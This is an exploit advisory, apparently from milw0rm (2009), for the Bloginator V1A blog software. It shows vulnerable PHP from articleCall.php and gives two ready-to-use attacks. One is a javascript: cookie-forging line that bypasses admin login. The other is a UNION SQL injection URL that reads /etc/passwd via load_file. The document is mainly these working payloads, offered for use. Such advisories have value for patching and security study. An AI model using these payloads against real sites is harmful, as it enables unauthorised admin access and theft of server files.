
Bloginator v1a Cookie BypassSQL Multiple Remote Vulnerabilities

   1   ##########################################################################
   2
   3   Author = FireShot , Jacopo Vuga.
   4   Mail = fireshot<at>autistici<dot>org
   5
   6   Software = Bloginator V1A
   7   Download = http://kamads.com/kamads_ads/download.php?email=bloginator&ID=0
   8
   9   Greets to = Osirys, Myral, str0ke
  10
  11   ###########################################################################
  12
  13   Vulnerability = Insecure Cookie Handling
  14
  15   ###########################################################################
  16
  17   [CODE]
  18
  19   [URL] www.site.com/bloginator/articleCall.php
  20
  21   global $name,$password,$returnLink;
  22   $p_name = strip_tags(substr($_POST[’name’],0,32));
  23   $p_password = strip_tags(substr($_POST[’password’],0,32));
  24   if(crypt($p_name , $name) == $name and crypt($p_password,$password) == $password )
  25    {
  26
  27                setcookie("identifyYourself","you are identified");
  28                print "Login successfull<br>";
  29                print $returnLink;
  30           }
  31       else {print "Wrong username or password";
  32       }
  33   }
  34
  35   [/CODE]
  36
  37
  38   [EXPLOIT]
  39
  40   javascript:document.cookie = "identifyYourself=you+are+identified; path=/";
  41
  42   [/EXPLOIT]
  43
  44   ############################################################################
  45
  46   Vulnerability = SQL injection
  47
  48   ############################################################################
  49
  50   [CODE]
  51
  52   [URL] www.site.com/bloginator/articleCall.php
  53
  54   $action = @$_GET[’action’];
  55   [...]
  56   $id = $_GET[’id’];
  57   [...]
  58   function editArticle($id,$message)
  59   {
  60   global $returnLink;
  61   $query = "select * FROM articles WHERE id=’$id’";
  62   $sql = mysql_query($query) or die(mysql_query());
  63   $title = mysql_result($sql,0,’title’);
  64   $title = htmlentities($title);
  65   $article = mysql_result($sql,0,’article’);
  66   $article = htmlentities($article);
  67   $link = mysql_result($sql,0,’link’);
  68   $link = htmlentities($link);
  69
  70   startHTML("Edit ID # ".$id);
  71   ?>
  72
  73   [/CODE]
  74
  75   [EXPLOIT]
  76
  77   As Admin (after the cookie exploit above) you can inject arbitrary SQL code into the query.
  78
  79   www.site.com/action=edit&id=fireshot’ union select 1,2,3,4,load_file(’/etc/passwd’),6,7 order by ’*
  80
  81   [/EXPLOIT]
  82
  83   ##############################################################################
  84
  85   # milw0rm.com [2009-03-19]





				